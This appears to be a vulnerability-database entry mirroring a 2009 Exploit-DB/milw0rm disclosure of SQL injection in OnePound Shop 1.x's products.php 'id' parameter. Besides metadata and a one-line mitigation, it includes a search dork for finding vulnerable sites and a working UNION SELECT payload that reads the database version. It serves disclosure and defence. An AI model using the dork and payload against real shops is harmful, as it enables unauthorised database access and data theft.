OnePound Shop 1.x products.php SQL Injection Vulnerability

vendor:

OnePound Shop

by:

Affix

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: OnePound Shop

Affected Version From: 1.x

Affected Version To: 1.x

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

OnePound Shop 1.x products.php SQL Injection Vulnerability

A vulnerability in OnePound Shop 1.x allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'products.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This vulnerability is also known as 'SQL Injection'.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#################################################################
#		      _______ _________ _       		#
#		     (  ____ )\__   __/( (    /|		#
#		     | (    )|   ) (   |  \  ( |		#
#		     | (____)|   | |   |   \ | |		#
#		     |     __)   | |   | (\ \) |		#
#		     | (\ (      | |   | | \   |		#
#		     | ) \ \__   | |   | )  \  |		#
#		     |/   \__/   )_(   |/    )_)		#
#                        http://root-the.net 			#
#################################################################
#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
#[+] Vendor : onepound.cn <ttp://www.onepound.cn/>              #
#[+] Exploit : Affix <root@root-the.net>			#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0		#
#[+] dork : "Powered by OnePound"				#
#################################################################

Example :
   http://site.com/products.php?id='

Demo :
   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--

# milw0rm.com [2009-07-13]